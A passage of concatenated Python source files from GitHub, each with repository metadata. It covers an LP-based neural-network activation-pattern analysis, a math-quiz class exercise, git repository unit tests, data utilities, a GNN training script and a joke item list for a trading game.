            expression.pop('_')
            # remove forced active relus
            # NOTE(review): iterating `forced_active` fails if it is still the
            # default None on this path — confirm callers always pass a set
            for r in forced_active:
                expression.pop(self.relus_node2name[r].name, None)
            # rank relus by layer
            layer_score = lambda relu_name: len(uncertain) - list(relu_name in u for u in uncertain).index(True)
            # rank relus by coefficient
            coeff_rank = sorted(expression.items(), key=lambda item: (layer_score(item[0]), abs(item[1])), reverse=True)
            coeff_score = lambda relu_name: list(relu_name == item[0] for item in coeff_rank).index(True)
            # rank relu by range size
            range_size = lambda relu_name: state.ranges[relu_name]
            range_rank = sorted(list((relu, range_size(relu)) for relu in expression.keys()), key=lambda item: (layer_score(item[0]), item[1]), reverse=True)
            range_score = lambda relu_name: list(relu_name == item[0] for item in range_rank).index(True)
            # rank relu by polarities
            polarity = lambda relu_name: abs(state.polarities[relu_name])
            pol_rank = sorted(list((relu, polarity(relu)) for relu in expression.keys()), key=lambda item: (len(uncertain) - layer_score(item[0]), item[1]))
            pol_score = lambda relu_name: list(relu_name == item[0] for item in pol_rank).index(True)
            # determine final rank
            rank = lambda relu: coeff_score(relu) + range_score(relu) + pol_score(relu)
            ranked = sorted(list((relu, rank(relu)) for relu in expression.keys()), key=lambda item: item[1])
            # return chosen uncertain relu(s)
            choice: str = ranked[0][0]
            r_layer = list(choice in u for u in uncertain).index(True)
            r_coeff = expression[choice]
            r_range = state.ranges[choice]
            r_polarity = state.polarities[choice]
            r_rank = '(layer: {}, coeff: {}, range: {}, polarity, {})'.format(r_layer, r_coeff, r_range, r_polarity)
            print('Choice: ', choice, r_rank)
            chosen: Set[str] = {choice}
            # also pick every ReLU sharing exactly the same symbolic expression
            expression = state.expressions[choice]
            r_chosen = list()
            for name, expr in state.expressions.items():
                if name != choice and expr == expression:
                    chosen.add(name)
                    r_chosen.append(name)
            print('Chosen: {}'.format(', '.join(r_chosen)))
            # back-substitution
            current = dict(expression)
            while any(variable in state.expressions for variable in expression.keys()):
                for sym, val in state.expressions.items():
                    if sym in current:
                        current = substitute_in_dict(current, sym, val)
                expression = current
            return 0, activations, (chosen, expression)
    def is_redundant(self, constraint, ranges, constraints):
        """
        Set the objective coefficients to those of one of the constraints, disable that constraint and solve the LP:
        - if the constraint was a LE maximize. In case the optimal value is less or equal to the rhs, the constraint is redundant
        - analogously if the constraint was GE minimize. disabled constraint is redundant if the optimal value or greater or equal to the rhs.
        """
        (expr, activity) = constraint
        _ranges = dict(ranges)
        # build a PuLP problem dict: objective = the candidate constraint,
        # subject to all the other constraints and the variable ranges
        current = dict(
            objective=dict(
                name=None,
                coefficients=[
                    {"name": name, "value": value} for name, value in expr.items() if name != '_'
                ]),
            constraints=[
                dict(
                    sense=status,
                    pi=None,
                    constant=expression['_'],
                    name=None,
                    coefficients=[
                        {"name": name, "value": value} for name, value in expression.items() if name != '_'
                    ],
                ) for expression, status in constraints
            ],
            variables=[dict(lowBound=l, upBound=u, cat="Continuous", varValue=None, dj=None, name=v) for v, (l, u) in
                       _ranges.items()],
            parameters=dict(name="NoName", sense=-activity, status=0, sol_status=0),
            sos1=list(),
            sos2=list(),
        )
        var, problem = pulp.LpProblem.fromDict(current)
        problem.solve(PULP_CBC_CMD(msg=False))
        # NOTE(review): activity == 0 falls through and returns None — confirm
        # callers never pass a zero activity
        if activity < 0:
            return pulp.value(problem.objective) + expr['_'] <= 0
        elif activity > 0:
            return pulp.value(problem.objective) + expr['_'] >= 0
    def to_pulp(self, ranges, constraints):
        """
        Tighten variable bounds under `constraints` via per-variable LPs.
        :return: None when the system is infeasible, otherwise a list of
            (VariableIdentifier, (lower, upper)) pairs
        """
        _ranges = dict(ranges)
        # dummy variable gives a constant objective for the feasibility check
        _ranges["__dummy"] = (0, 0)
        current = dict(
            objective=dict(name=None, coefficients=[{"name": "__dummy", "value": 1}]),
            constraints=[
                dict(
                    sense=status,
                    pi=None,
                    constant=expression['_'],
                    name=None,
                    coefficients=[
                        {"name": name, "value": value} for name, value in expression.items() if name != '_'
                    ],
                ) for expression, status in constraints
            ],
            variables=[dict(lowBound=l, upBound=u, cat="Continuous", varValue=None, dj=None, name=v) for v, (l, u) in
                       _ranges.items()],
            parameters=dict(name="NoName", sense=1, status=0, sol_status=0),
            sos1=list(),
            sos2=list(),
        )
        var, problem = pulp.LpProblem.fromDict(current)
        problem.solve(PULP_CBC_CMD(msg=False))
        if problem.status == -1:
            return None
        else:
            # feasible: minimize and maximize each variable to get tight bounds
            bounds = dict()
            for name in ranges:
                _current = deepcopy(current)
                _current['objective'] = {'name': 'OBJ', 'coefficients': [{'name': name, 'value': 1}]}
                _current['parameters'] = {'name': '', 'sense': 1, 'status': 1, 'sol_status': 1}  # min
                _, _problem = pulp.LpProblem.fromDict(_current)
                _problem.solve(PULP_CBC_CMD(msg=False))
                lower = pulp.value(_problem.objective)
                current_ = deepcopy(current)
                current_['objective'] = {'name': 'OBJ', 'coefficients': [{'name': name, 'value': 1}]}
                current_['parameters'] = {'name': '', 'sense': -1, 'status': 1, 'sol_status': 1}  # max
                _, problem_ = pulp.LpProblem.fromDict(current_)
                problem_.solve(PULP_CBC_CMD(msg=False))
                upper = pulp.value(problem_.objective)
                bounds[VariableIdentifier(name)] = (lower, upper)
            return list(bounds.items())
    def original_status(self, relu_names):
        """
        :return: 1 if all `relu_names` were active in the original activation
            pattern, -1 if all inactive; raises ValueError otherwise
        """
        # retrieve uncertain relus
        for pack in self.pattern:
            if all(name in pack[0] for name in relu_names):
                return 1
            elif all(name in pack[1] for name in relu_names):
                return -1
        raise ValueError
    def print_pattern(self, activations):
        """Print totals of active/inactive/uncertain ReLUs over all layers."""
        activated, deactivated, uncertain = 0, 0, 0
        # print('Activation Pattern: {', end='')
        for (a, d, u) in activations:
            # print('[')
            activated += len(a)
            # print('activated: ', ','.join(self.relus_node2name[n].name for n in a))
            deactivated += len(d)
            # print('deactivated: ', ','.join(self.relus_node2name[n].name for n in d))
            uncertain += len(u)
            # print('uncertain: ', ','.join(self.relus_node2name[n].name for n in u))
            # print(']', end='')
        # print('}')
        print('#Active: ', activated, '#Inactive: ', deactivated, '#Uncertain: ', uncertain, '\n')
    def search(self, in_nxt, in_f_active, in_f_inactive, in_constraints):
        """
        Explore one path of the activation-pattern search: repeatedly run the
        forward analysis, split on a chosen uncertain ReLU (keeping its
        original phase flipped on this path) and collect the alternative
        branches to explore later.
        :return: list of (chosen, constraints, nxt, f_active, f_inactive)
            alternatives for subsequent paths
        """
        status = 0
        nxt = in_nxt
        f_active, f_inactive = set(in_f_active), set(in_f_inactive)
        constraints = list(in_constraints)
        alternatives = list()
        while status == 0:
            if nxt is None:
                # infeasible region (to_pulp returned None): report and stop
                r_cstr = ''
                for i, (e, a) in enumerate(constraints):
                    r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in e.items() if n != '_')
                    r_expr = r_expr + ' + {}'.format(e['_'])
                    if a > 0:
                        r_cstr = r_cstr + '[{}+]: '.format(i) + r_expr + ' >= 0\n'
                    else:
                        r_cstr = r_cstr + '[{}-]: '.format(i) + r_expr + ' <= 0\n'
                print('Constraints: ', r_cstr)
                print('\n⊥︎')
                return alternatives
            r_nxt = '; '.join('{} ∈ [{}, {}]'.format(i, l, u) for i, (l, u) in nxt if l != u)
            print(Fore.YELLOW + '\n||{}||'.format('=' * (len(r_nxt) + 2)))
            print('|| {} ||'.format(r_nxt))
            print('||{}||\n'.format('=' * (len(r_nxt) + 2)), Style.RESET_ALL)
            entry_full = self.initial.assume(nxt)
            r_cstr = ''
            for i, (e, a) in enumerate(constraints):
                r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in e.items() if n != '_')
                r_expr = r_expr + ' + {}'.format(e['_'])
                if a > 0:
                    r_cstr = r_cstr + '[{}+]: '.format(i) + r_expr + ' >= 0\n'
                else:
                    r_cstr = r_cstr + '[{}-]: '.format(i) + r_expr + ' <= 0\n'
            print('Constraints: ', r_cstr)
            status, pattern, picked = self.fwd(entry_full, forced_active=f_active, forced_inactive=f_inactive)
            if status == 1:
                print('✔︎')
                return alternatives
            elif status == -1:
                print('✘')
                return alternatives
            elif status is None:
                print('TODO')
                return alternatives
            else:
                (chosen, expression) = picked
                r_expr = ' + '.join('({})*{}'.format(v, n) for n, v in expression.items() if n != '_')
                r_cstr = r_expr + ' + {}'.format(expression['_'])
                activity = self.original_status(chosen)
                # if constraints and self.is_redundant((expression, -activity), dict([(f[0].name, f[1]) for f in nxt]), constraints):
                #     print('Redundant Constraint: ', r_cstr, ' <= 0')
                #     # the alternative should be unfeasible
                #     # ...
                #     # (_chosen, _constraints, _nxt, _f_active, _f_inactive) = alternatives[-1]
                #     # for name in chosen:
                #     #     _f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
                #     # alternatives[-1] = (_chosen, _constraints, _nxt, _f_active, _f_inactive)
                #     # return alternatives
                # elif constraints and self.is_redundant((expression, activity), dict([(f[0].name, f[1]) for f in nxt]), constraints):
                #     print('Redundant Constraint: ', r_cstr, ' >= 0')
                #     # the alternative should be unfeasible
                #     # ...
                #     # (_chosen, _constraints, _nxt, _f_active, _f_inactive) = alternatives[-1]
                #     # for name in chosen:
                #     #     _f_active.add(self.relus_name2node[VariableIdentifier(name)])
                #     # alternatives[-1] = (_chosen, _constraints, _nxt, _f_active, _f_inactive)
                #     # return alternatives
                alt_f_active, alt_f_inactive = set(f_active), set(f_inactive)
                # this path flips the ReLU's original phase; the alternative keeps it
                if activity > 0:  # originally active
                    for name in chosen:
                        f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
                    r_cstr = r_cstr + ' <= 0'
                    for name in chosen:
                        alt_f_active.add(self.relus_name2node[VariableIdentifier(name)])
                else:  # originally inactive
                    assert activity < 0
                    for name in chosen:
                        f_active.add(self.relus_name2node[VariableIdentifier(name)])
                    # NOTE(review): the displayed message says '<= 0' in both
                    # branches; the inactive case likely means '>= 0' (display only)
                    r_cstr = r_cstr + ' <= 0'
                    for name in chosen:
                        alt_f_inactive.add(self.relus_name2node[VariableIdentifier(name)])
                print('Added Constraint: ', r_cstr)
                alt_constraints = list(constraints)
                alt_constraints.append((expression, activity))
                alt_nxt = self.to_pulp(dict([(f[0].name, f[1]) for f in nxt]), alt_constraints)
                constraints.append((expression, -activity))
                nxt = self.to_pulp(dict([(f[0].name, f[1]) for f in nxt]), constraints)
                alternatives.append((chosen, alt_constraints, alt_nxt, alt_f_active, alt_f_inactive))
    def analyze(self, initial: State):
        """
        Entry point: record the unperturbed activation pattern, then explore
        activation-pattern paths over the perturbed input region [0, 1].
        """
        print(Fore.BLUE + '\n||==================================||')
        print('|| domain: {}'.format(self.domain))
        print('||==================================||', Style.RESET_ALL)
        self._initial = initial
        print(Fore.MAGENTA + '\n||==========||')
        print('|| Original ||')
        print('||==========||\n', Style.RESET_ALL)
        # zero perturbation pins down the reference activation pattern
        unperturbed = [(feature, (0, 0)) for feature in self.inputs]
        entry_orig = self.initial.assume(unperturbed)
        status, pattern, _ = self.fwd(entry_orig)
        # set original activation pattern
        self._pattern = list()
        for (a, d, _) in pattern:
            _a = set(self.relus_node2name[n].name for n in a)
            _d = set(self.relus_node2name[n].name for n in d)
            self._pattern.append((_a, _d))
        prefix = list()
        print(Fore.MAGENTA + '\n||========||')
        print('|| Path 0 ||')
        print('||========||\n', Style.RESET_ALL)
        nxt = [(feature, (0, 1)) for feature in self.inputs]
        f_active, f_inactive, constraints, alternatives = set(), set(), list(), list()
        suffix = self.search(nxt, f_active, f_inactive, constraints)
        alternatives = prefix + suffix
        path = 1
        # depth-first over pending alternatives, hard-capped at 50 paths
        while len(alternatives) > 0 and path < 50:
            print(Fore.MAGENTA + '\n||========||')
            print('|| Path {} ||'.format(path))
            print('||========||\n', Style.RESET_ALL)
            relu, constraints, nxt, f_active, f_inactive = alternatives[-1]
            prefix = alternatives[:-1]
            suffix = self.search(nxt, f_active, f_inactive, constraints)
            alternatives = prefix + suffix
            path = path + 1
        print('Done')
class ActivationPatternForwardSemantics(DefaultForwardSemantics):
    """Forward semantics whose `assume` calls constrain the abstract state."""
    def assume_call_semantics(self, stmt: Call, state: State) -> State:
        # evaluate the call argument, assume it on the state, clear the result
        argument = self.semantics(stmt.arguments[0], state).result
        state.assume(argument)
        state.result = set()
        return state
73386469274 | '''
lab13_exercises.py
You will write a class called MathQuiz. It will contain five (5) methods
and simulate a student taking a basic math quiz.
The __init__ method will have three parameters: self, the student name, and a file name.
Assign the names to instance variables and create four more:
a score set to 0,
a boolean for whether the test is graded,
a list for the questions,
and a list for the student responses.
It should also read in the quiz text file and load each line into the questions instance variable.
The __repr__ method should print out the student name, followed by a line of dashes,
whether or not the quiz is graded, their score, and their percentage.
It should look something like this:
Name: Nathan
================
Graded: True
Score: 4/5
Percentage: 80%
or
Name: Nathan
================
Graded: False
The user_submission method will take one parameter: self.
It will print the student name and then print each problem
from the questions list and "add the user's answer to the responses list."
The check_answer method takes three parameters: self, a string question, and an string answer.
It must compare the question to the answer, performing the correct operation,
and returns true if the answer matches and false if it does not.
Eg: student.check_answer('2 + 2', '4') --> True
student.check_answer("4 - 2", "1") --> False
The grade_quiz() method takes one parameter: self.
It uses check_answer to compare the questions list and the response list.
For each correct answer, add one to the score
In the main, create two instances of the MathQuiz class and call user_submission on both.
Then print each instance to see the results.
'''
class MathQuiz:
    """A basic arithmetic quiz loaded from a text file, one question per line."""

    def __init__(self, name, fname):
        """Load the quiz questions from *fname* for the student *name*."""
        self.name = name
        self.score = 0          # number of correct answers, set by grade_quiz()
        self.graded = False     # True once grade_quiz() has run
        self.questions = []     # question strings such as '2 + 2'
        self.responses = []     # the student's answers, as strings
        # Use a context manager so the quiz file is closed (the original leaked it).
        with open(fname, 'r') as quiz_file:
            for line in quiz_file:
                self.questions.append(line.strip())

    def __repr__(self):
        """Return a report card: name, graded flag and, once graded, score and percentage."""
        content = '\nName:'.ljust(5) + self.name.rjust(11) + '\n'
        content += '=' * 16 + '\n'
        content += 'Graded:'.ljust(11) + str(self.graded).rjust(5) + '\n'
        if self.graded:
            content += 'Score:'.ljust(12) + str(self.score).rjust(2) + '/5\n'
            content += 'Percentage:'.ljust(12) + (str(self.score * 20) + '%').rjust(4) + '\n'
        return content

    def user_submission(self):
        """Prompt the student for an answer to every question and record the responses."""
        print(self)
        for problem in self.questions:
            user_response = input(problem + ' = ')
            self.responses.append(user_response)

    def check_answer(self, question, answer):
        """Return True if *answer* solves *question*, e.g. check_answer('2 + 2', '4') -> True.

        Fixes the original implementation, which misspelled ``question``
        (NameError on first use), indexed the operator instead of the right
        operand, and applied arithmetic to strings instead of ints.
        """
        left, sign, right = question.split()
        left, right = int(left), int(right)
        if sign == '+':
            result = left + right
        elif sign == '-':
            result = left - right
        elif sign == '*':
            result = left * right
        elif sign == '/':
            result = left / right
        else:
            raise ValueError('unsupported operator: ' + sign)
        return result == int(answer)

    def grade_quiz(self):
        """Score the recorded responses against the questions and mark the quiz graded."""
        for j in range(len(self.questions)):
            if self.check_answer(self.questions[j], self.responses[j]):
                self.score += 1
        self.graded = True
def main():
    """Run the quiz for two students, grade both, and print their report cards."""
    students = [MathQuiz('nick', 'quiz.txt'), MathQuiz('benson', 'quiz.txt')]
    for student in students:
        student.user_submission()
    for student in students:
        student.grade_quiz()
    for student in students:
        print(student)


if __name__ == "__main__":
    main()
| ksh1ng/python_Exercise | lab13_exercises.py | lab13_exercises.py | py | 3,581 | python | en | code | 1 | github-code | 50 |
73144689435 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import shutil
import unittest
import git
from gitenberg.local_repo import LocalRepo
class TestLocalRepo(unittest.TestCase):
    """Exercise LocalRepo against a real, throwaway git repository on disk."""

    relative_test_repo_path = './gitenberg/tests/test_data/test_repo'

    def setUp(self):
        # Fresh, empty repository for every test.
        git.Repo.init(self.relative_test_repo_path)
        self.local_repo = LocalRepo(self.relative_test_repo_path)

    def tearDown(self):
        shutil.rmtree(self.relative_test_repo_path)

    def _touch_file(self, name):
        """Create an empty file called *name* inside the test repository."""
        path = os.path.join(self.relative_test_repo_path, name)
        with open(path, 'a'):
            os.utime(path, None)

    def test_add_file(self):
        # If we create a file in a repo, and add it to the stage
        # is it listed in the representation of the index/stage
        self._touch_file('foof')
        self.local_repo.add_file('foof')
        self.assertEqual(
            set(self.local_repo.git.index.entries.keys()),
            {(u'foof', 0)}
        )

    def test_add_all_files(self):
        # Plain loop instead of a comprehension used only for side effects.
        for name in ['foof', 'offo.txt', 'fofo.md']:
            self._touch_file(name)
        self.local_repo.add_all_files()
        self.assertEqual(
            set(self.local_repo.git.index.entries.keys()),
            {(u'fofo.md', 0), (u'offo.txt', 0), (u'foof', 0)}
        )

    def test_add_all_files_filters_ignore_list(self):
        # .ogg files are expected to be filtered out by the ignore list.
        for name in ['offo.txt', 'fofo.ogg', 'zoom']:
            self._touch_file(name)
        self.local_repo.add_all_files()
        # Compare as sets: git index entry order is not guaranteed, and the
        # sibling tests above already compare this way (the original list
        # comparison was order-dependent and flaky).
        self.assertEqual(
            set(self.local_repo.git.index.entries.keys()),
            {(u'offo.txt', 0), (u'zoom', 0)}
        )

    def test_commit(self):
        """Committing a staged file records the given commit message."""
        file_name = 'foom.txt'
        message = 'this is a commit messaage'
        self._touch_file(file_name)
        self.local_repo.add_file(file_name)
        self.local_repo.commit(message)
        latest_commit = self.local_repo.git.heads.master.commit
        self.assertEqual(
            latest_commit.message,
            message
        )

    def test_file_checks(self):
        # A brand-new repo reports no metadata file.
        self.assertFalse(self.local_repo.metadata_file)
| gitenberg-dev/gitberg | gitenberg/tests/test_local_repo.py | test_local_repo.py | py | 2,078 | python | en | code | 105 | github-code | 50 |
7257311945 | import os
import pandas as pd
from sklearn.externals import joblib
from settings import SAVE_MODEL_PATH, SAVE_PREDICTION_PATH, TESTING__DATA_PATH, TRAINING__DATA_PATH
def read_dataframe(path, type='csv'):
    """Load a dataframe from *path*, resolved relative to this module's directory.

    Only ``type='csv'`` is supported; anything else raises RuntimeError.
    """
    base_dir = os.path.abspath(os.path.dirname(__file__))
    abs_path = os.path.join(base_dir, path)
    if type == 'csv':
        return pd.read_csv(abs_path)
    raise RuntimeError("file types other than csv is not supported")
def save_dataframe(dataframe, path=SAVE_PREDICTION_PATH, columns=[]):
    """Write *dataframe* as CSV (no index) to *path*, resolved relative to this module.

    NOTE(review): the default ``columns=[]`` selects no data columns -- confirm
    that callers always pass an explicit column list.
    """
    target = os.path.join(os.path.abspath(os.path.dirname(__file__)), path)
    dataframe.to_csv(target, columns=columns, index=False)
def get_training_data(path=TRAINING__DATA_PATH):
    """Return the training features: every column except the 'applications' label."""
    frame = read_dataframe(path, "csv")
    return frame.drop("applications", axis=1)
def get_testing_data(path=TESTING__DATA_PATH):
    """Return the raw testing dataframe."""
    return read_dataframe(path, "csv")
def get_training_labels(label, path=TRAINING__DATA_PATH):
    """Return a copy of the *label* column from the training data."""
    return read_dataframe(path, "csv")[label].copy()
def save_trained_model(model, path=SAVE_MODEL_PATH):
    """Persist *model* with joblib to *path*, resolved relative to this module."""
    target = os.path.join(os.path.abspath(os.path.dirname(__file__)), path)
    joblib.dump(model, target)
def get_saved_model(path=SAVE_MODEL_PATH):
    """Load and return the joblib-persisted model from *path*, resolved relative to this module."""
    target = os.path.join(os.path.abspath(os.path.dirname(__file__)), path)
    return joblib.load(target)
| ahmedezzeldin93/heyjobs | job_app/utils.py | utils.py | py | 1,561 | python | en | code | 0 | github-code | 50 |
1156488675 |
def to_file_fasta(item, selection='all', structure_indices='all', output_filename=None, syntaxis='MolSysMT'):
    """Write a Biopython ``Seq`` object out as a FASTA file.

    All parameters are forwarded to :func:`molsysmt.basic.convert`;
    *output_filename* (the target ``.fasta`` path) is required.

    Raises:
        ValueError: if *item* is not a Biopython ``Seq`` or *output_filename* is None.
        (The original raised bare ValueErrors with no message.)
    """
    from molsysmt.tools.biopython_Seq import is_biopython_Seq
    from molsysmt.basic import convert
    if not is_biopython_Seq(item):
        raise ValueError('item must be a Biopython Seq object')
    if output_filename is None:
        raise ValueError('output_filename must be provided')
    tmp_item = convert(item, to_form=output_filename, selection=selection,
                       structure_indices=structure_indices, syntaxis=syntaxis)
    return tmp_item
| uibcdf/MolSysMT | attic/form/biopython_Seq/to_file_fasta.py | to_file_fasta.py | py | 498 | python | en | code | 11 | github-code | 50 |
25292007954 | """
Train a simple GNN model on
gamma data
"""
import numpy as np
from matplotlib import pyplot as plt
from gamma_gnn.dataset.gamma import GammaDataset
from gamma_gnn.utils.loader import Loader
from gamma_gnn.models import GNN
from gamma_gnn.optimizers import Optimizer
from gamma_gnn.losses import LossHandler
from gamma_gnn.metrics import MetricHandler
from gamma_gnn.utils.callbacks import CallbackHandler
from gamma_gnn.trainer import Trainer
if __name__ == "__main__":
    # now generate graph data
    gamma_dataset = GammaDataset(
        "gamma",
        "data/raw/gammas.npz",
        "data/"
    )
    # create the data loader
    # (10% test and 10% validation splits, both with fixed seeds for reproducibility)
    gamma_loader = Loader(
        gamma_dataset,
        batch_size=16,
        test_split=0.1,
        test_seed=0,
        validation_split=0.1,
        validation_seed=0,
        num_workers=8
    )
    """
    Construct the gamma Model, specify the loss and the
    optimizer and metrics.
    """
    # Model hyperparameters, consumed by GNN below via ``cfg``.
    gamma_config = {
        "embedding_size": 32,
        "attention_heads": 2,
        "layers": 4,
        "top_k_ratio": 0.8,
        "top_k_every_n": 3,
        "dense_neurons": 64
    }
    gamma_model = GNN(
        name = 'gamma_test',
        feature_size=gamma_dataset[0].x.shape[1],  # node-feature width taken from the first sample
        edge_dim=gamma_dataset[0].edge_attr.shape[1],  # edge-feature width taken from the first sample
        cfg = gamma_config
    )
    # create loss, optimizer and metrics
    gamma_optimizer_config = {
        "optimizer": "SGD",
        "learning_rate": 0.01,
        "momentum": 0.8,
        "weight_decay": 0.0001,
        "schedulers": {
            "ExponentialLR": {
                "gamma": 1.0,
            },
        }
    }
    gamma_optimizer = Optimizer(
        model=gamma_model,
        cfg=gamma_optimizer_config
    )
    # create criterions
    gamma_loss_config = {
        'BCELoss': {
            'alpha': 1.0,
            'reduction':'mean',
        },
    }
    gamma_loss = LossHandler(
        name="gamma_loss",
        cfg=gamma_loss_config,
    )
    # create metrics
    # All binary-classification metrics share the same 0.5 decision cutoff.
    gamma_metric_config = {
        'BinaryAccuracy': {
            'cutoff': 0.5,
        },
        'Precision': {
            'cutoff': 0.5,
        },
        'Recall': {
            'cutoff': 0.5,
        },
        'F1Score': {
            'cutoff': 0.5,
        },
        'ROCAUC': {
            'cutoff': 0.5,
        },
        # 'OutputSaver': {},
        # 'TargetSaver': {},
    }
    gamma_metrics = MetricHandler(
        "gamma_metric",
        cfg=gamma_metric_config,
    )
    # create callbacks
    callback_config = {
        'loss': {'criterion_list': gamma_loss},
        'metric': {'metrics_list': gamma_metrics},
    }
    gamma_callbacks = CallbackHandler(
        "gamma_callbacks",
        callback_config
    )
    # create trainer
    gamma_trainer = Trainer(
        model=gamma_model,
        criterion=gamma_loss,
        optimizer=gamma_optimizer,
        metrics=gamma_metrics,
        callbacks=gamma_callbacks,
        metric_type='test',
        gpu=True,
        gpu_device=0
    )
    # Train for 25 epochs; checkpoint=25 presumably controls checkpoint frequency -- TODO confirm.
    gamma_trainer.train(
        gamma_loader,
        epochs=25,
        checkpoint=25
) | Neutron-Calibration-in-DUNE/NeutronCaptureGNN | examples/train_model.py | train_model.py | py | 3,160 | python | en | code | 0 | github-code | 50 |
5321499180 | # ITEMS AND DIALOG
# This is the list of items, their value (which is slightly changed for each trader), and their description
# template: {"name":"", "value":1, "desc":""},
ITEMS = [
{"name":"soggy cardboard", "value":1, "desc":"less than completely useless"},
{"name":"dry cardboard", "value":2, "desc":"completely useless"},
{"name":"hardened flower petal", "value":3, "desc":"or you could call it a dead flower petal"},
{"name":"disappointment potion", "value":11, "desc":"it doesn't work"},
{"name":"potion of thirst-quenching", "value":10, "desc":"it's called water"},
{"name":"hollow rock", "value":5, "desc":"there's nothing inside"},
{"name":"artificial cloud generator", "value":15, "desc":"it boils water"},
{"name":"sharpened blade of grass", "value":6, "desc":"disclaimer, use a different sword, this one breaks easily"},
{"name":"troll skin", "value":21, "desc":"fresh from the cheese grater"},
{"name":"grilled worm steak", "value":25, "desc":"tastes just as good as normal steak"},
{"name":"moldy piece of cake", "value":14, "desc":"eat at your own risk"},
{"name":"canned walmart bag", "value":10, "desc":"walmart bags carry groceries, this carries walmart bags!"},
{"name":"bottled water bottle", "value":9, "desc":"just in case you spill it"},
{"name":"beaned beef", "value":13, "desc":"beef filled with beans"},
{"name":"nutty squirrel", "value":27, "desc":"normal squirrel, only eats acorns"},
{"name":"slug butter", "value":23, "desc":"rich and creamy"},
{"name":"cat juice", "value":31, "desc":"what is it? think of squeezing lemons"},
{"name":"crushed eyeball soup", "value":26, "desc":"it takes precision to crush eyeballs"},
{"name":"old cheese", "value":30, "desc":"this cheese is ready for the slaughterhouse"},
{"name":"young cheese", "value":34, "desc":"don't eat it yet, it's just a baby!"},
{"name":"flour patch kids", "value":36, "desc":"for flour-y people, not sour-y people!"},
{"name":"canned artificial flavoring", "value":42, "desc":"tastes like chicken! Or anything, really"},
{"name":"empty recycling box", "value":33, "desc":"you have to find a way to make people fill it"},
{"name":"book of spells", "value":35, "desc":"#1 wizard recommended spellbook"},
{"name":"normal toilet seat", "value":40, "desc":"you were either relieved or confused when you saw the word 'normal' before toilet seat (or possibly unhappy, in which case you must be very bored)"},
{"name":"godly piece of cake", "value":64, "desc":"use it wisely"},
{"name":"golden toilet seat", "value":102, "desc":"you thought it was real gold! HA"},
{"name":"unicorn sprinkles", "value":121, "desc":"no unicorns were harmed in the making of these sprinkles"},
{"name":"100 dalmatians", "value":101, "desc":"we didn't have room for that last one"},
{"name":"radioactive kitten paw", "value":120, "desc":"contains small amount of uranium"},
{"name":"3000-year-old water", "value":3000, "desc":"NEWEST WATER IN THE UNIVERSE"},
{"name":"weasel stomping boots", "value":631, "desc":"titanium soles, automagically detects weasels and brings you to them"},
{"name":"sparkling gemstone water", "value":420, "desc":"melted gemstones + water"},
{"name":"gold from the end of the rainbow", "value":777, "desc":"a rainbow was monitored and tracked carefully (by lunatics) to locate this gold"},
{"name":"blue swedish fish", "value":19.99, "desc":"this color of swedish fish is nearly impossible to find in the wild"},
{"name":"letter cube", "value":26, "desc":"it has all the letters"},
{"name":"completed number cube", "value":123, "desc":"it has all the numbers"},
{"name":"sentient toilet seat", "value":111, "desc":"I'd be nice to it if I were you"},
{"name":"all-seeing toilet seat", "value":666, "desc":"now it can see you even when you aren't sitting on it"},
{"name":"fancy squirrel", "value":420, "desc":"sometimes eats things more expensive than acorns (you'd better keep track of its poop)"},
{"name":"gold ring", "value":79, "desc":"it's a ring made of gold"},
{"name":"unicorn poop", "value":23.22, "desc":"I found a piece of chocolate! my unicorn dropped it"},
{"name":"time machine", "value":77403, "desc":"now you just have to find the keys"},
{"name":"fancy feast", "value":2+2, "desc":"gives your cats superpowers"},
{"name":"dodo bird", "value":1662, "desc":"as dead as a dodo"}
]
# For all these lists, NAME is replaced with the trader's name, SHOP is replaced with the shop name,
# ITEM is replaced with the trader's item's name, ITEMs is replaced with its pluralized form,
# and PRICE is replaced with the trader's price for the item
SHOPNAMES = [
"NAME's Shop Stop",
"NAME's Garage",
"NAME Marketing",
"NAME World",
"NAME's ITEM Palace",
"Easy NAME",
"NAME Express",
"ITEM Express",
"Best ITEMs",
"NAME's ITEMs",
"ITEM House",
"ITEM Store",
"ITEMs Now",
"NAME's ITEM Store",
"NAME's ITEM Stand",
"ITEM World",
"NAME ITEMs",
"NAME's Better ITEMs",
"NAME's ITEM Sale",
"ITEMs R Us"
]
# The following are dialog lists, each in order from angry to happy.
# When there are two with the same name (for example, DIALOG1, DIALOG2),
# it means that they are put together to make the final dialog.
# GREETINGS = [
# '''"What's up, customer?" NAME said, "Not my prices!"''',
# '''"What a lovely day," NAME said, "to buy my ITEMs!"''',
# ]
GREETINGS1 = [
'''"What do you want?" NAME grumbled. ''',
'''"Okay, you came to my shop," NAME shrugged. ''',
'''"My name's NAME," said NAME. ''',
'''"I'm NAME," said NAME. ''',
'''"Hello human," NAME said. ''',
'''"What's up, customer?" NAME said. ''',
'''"What a lovely day," said NAME. ''',
'''"Fine day to buy from me!" NAME exclaimed. ''',
'''"Good day, customer," NAME said cheerfully. ''',
'''"Hello!" said NAME. ''',
'''"A beautiful customer has come!!" NAME yelped happily. '''
]
GREETINGS2 = [
'''"Gimme money."''',
'''"Got any money?"''',
'''"I want your money."''',
'''"How much you gonna pay?"''',
'''"You're gonna give me lots of money!"''',
'''"Buy my ITEMs today!"''',
'''"Welcome to SHOP, where I sell ITEMs to everyone!"''',
'''"You should probably give me some money!"''',
'''"Came for the ITEM, did ya?"''',
'''"Welcome to the finest ITEM shop in the land!"''',
'''"Welcome to SHOP!"''',
]
# Prefix for the next three
BADOFFERCOUNT = [
'''NAME growled. ''',
'''NAME frowned. ''',
'''NAME sighed. ''',
'''NAME: ''',
'''NAME: ''',
'''NAME: ''',
'''NAME smiled. '''
]
# Too many offers
TOOMANY1 = [
'''"One price, you idiot,"''',
'''"I think one price should do,"''',
'''"The price is a very confusing subject, yes?"''',
'''"Only one price is needed"''',
'''"Uhhh.. wat?"''',
'''"Sorry?"''',
'''"What you say?"''',
'''"What was that?"'''
]
TOOMANY2 = [
'''"I'm angry!!"''',
'''"are you dumb?"''',
'''"so get on with it!"''',
'''"it's not that hard."''',
'''"you're not making any sense."''',
'''"you've confused me!"''',
'''"I don't understand your offer."'''
]
# No offers
OFFERNOT1 = [
'''"Give me a price, you imbecile!"''',
'''"A price??!"''',
'''"Offer your price!"''',
'''"What's your offer?"''',
'''"What price do you propose?"''',
